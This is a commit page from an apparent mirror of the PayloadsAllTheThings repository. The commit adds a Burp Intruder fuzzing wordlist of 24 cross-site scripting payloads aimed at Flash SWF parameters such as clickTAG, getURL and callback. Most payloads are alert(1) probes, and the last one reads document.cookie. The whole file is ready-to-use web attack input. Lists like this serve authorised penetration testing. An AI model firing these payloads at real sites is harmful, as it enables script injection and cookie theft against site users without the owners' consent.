mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2026-03-01 15:03:12 -08:00
More Burp Intruder file - SQLi + Path traversal + XSS
This commit is contained in:
24
XSS injection/Intruders/xss_swf_fuzz.txt
Executable file
24
XSS injection/Intruders/xss_swf_fuzz.txt
Executable file
@@ -0,0 +1,24 @@
|
||||
#getURL,javascript:alert(1)",
|
||||
#goto,javascript:alert(1)",
|
||||
?javascript:alert(1)",
|
||||
?alert(1)",
|
||||
?getURL(javascript:alert(1))",
|
||||
?asfunction:getURL,javascript:alert(1)//",
|
||||
?getURL,javascript:alert(1)",
|
||||
?goto,javascript:alert(1)",
|
||||
?clickTAG=javascript:alert(1)",
|
||||
?url=javascript:alert(1)",
|
||||
?clickTAG=javascript:alert(1)&TargetAS=",
|
||||
?TargetAS=javascript:alert(1)",
|
||||
?skinName=asfunction:getURL,javascript:alert(1)//",
|
||||
?baseurl=asfunction:getURL,javascript:alert(1)//",
|
||||
?base=javascript:alert(0)",
|
||||
?onend=javascript:alert(1)//",
|
||||
?userDefined=');function someFunction(a){}alert(1)//",
|
||||
?URI=javascript:alert(1)",
|
||||
?callback=javascript:alert(1)",
|
||||
?getURLValue=javascript:alert(1)",
|
||||
?goto=javascript:alert(1)",
|
||||
?pg=javascript:alert(1)",
|
||||
?page=javascript:alert(1)"
|
||||
?playerready=alert(document.cookie)
|
||||
Reference in New Issue
Block a user